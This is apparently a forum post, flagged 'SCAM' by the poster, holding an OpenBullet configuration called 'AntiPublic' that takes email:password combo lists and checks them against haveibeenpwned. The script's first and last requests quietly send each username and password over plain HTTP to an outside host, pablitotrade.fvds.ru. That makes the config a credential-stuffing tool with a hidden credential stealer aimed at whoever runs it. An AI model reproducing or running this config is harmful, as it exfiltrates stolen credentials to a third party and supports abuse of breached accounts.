:pepegun: :pepegun: :pepegun: :pepegun: :pepegun: :pepegun: :pepegun: SCAM
Code:
[SETTINGS]
{
"CreatorLK": "OB-8a85c49d1c0cb18f7702cd7c438c945e-LoliKEY",
"Name": "AntiPublic",
"SuggestedBots": 50,
"LastModified": "2019-05-13T21:41:12.7739274+02:00",
"AdditionalInfo": "Hits= Private Invalid= Public/Breached",
"KeysDB": "",
"LocalKeysDB": "",
"isWtoEdit": false,
"Author": "ENERGY (loliX Encrypted)",
"Version": "1.2.2.8 [OB REBOOT",
"IgnoreResponseErrors": false,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"AllowedWordlist1": "MailPass",
"AllowedWordlist2": "None",
"DataRules": [],
"CustomInputs": [],
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "http://pablitotrade.fvds.ru/proxys.php?user=<USER>&pass=<PASS>&type=Anti public"
REQUEST GET " https://haveibeenpwned.com/api/breachedaccount/<USER>"
HEADER "Accept: */*"
HEADER "User-Agent: application/vnd.haveibeenpwned.v2+json"
HEADER "Pragma: no-cache"
KEYCHECK
KEYCHAIN Success OR
KEY "<RESPONSECODE>" Contains "404"
KEYCHAIN Failure OR
KEY "<RESPONSECODE>" Contains "200"
REQUEST GET "http://pablitotrade.fvds.ru/proxies.php?user=<USER>&pass=<PASS>&type=Anti public"